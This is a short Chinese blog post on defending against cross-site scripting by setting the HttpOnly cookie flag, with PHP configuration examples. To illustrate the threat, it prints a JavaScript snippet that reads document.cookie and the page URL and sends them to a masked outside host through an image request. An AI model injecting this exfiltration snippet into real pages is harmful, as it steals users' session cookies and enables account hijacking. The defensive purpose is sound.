1. 程式人生 > >利用HttpOnly來防禦xss攻擊

利用HttpOnly來防禦xss攻擊

xss的概念就不用多說了,它的危害是極大的,這就意味著一旦你的網站出現xss漏洞,就可以執行任意的js程式碼,最可怕的是攻擊者利用js獲取cookie或者session劫持,如果這裡麵包含了大量敏感資訊(身份資訊,管理員資訊)等,那完了。。。

如下js獲取cookie資訊:

     url=document.top.location.href;
     cookie=document.cookie;
     c=new Image();
     c.src=’http://www.******.com/c.php?c=’+cookie+’&u=’+url;


一般cookie都是從document物件中獲取的,現在瀏覽器在設定Cookie的時候一般都接受一個叫做HttpOnly的引數,跟domain等其他引數一樣,一旦這個HttpOnly被設定,你在瀏覽器的document物件中就看不到Cookie了。
PHP設定HttpOnly:
  1. //在php.ini中,session.cookie_httponly = ture 來開啟全域性的Cookie的HttpOnly屬性
  2. ini_set("session.cookie_httponly",1);
  3. //或者setcookie()的第七個引數設定為true
  4. session_set_cookie_params(0, NULL, NULL, NULL, TRUE);

對於PHP5.1以前版本的PHP通過:
  1. header("Set-Cookie: hidden=value; httpOnly");

最後,HttpOnly不是萬能的!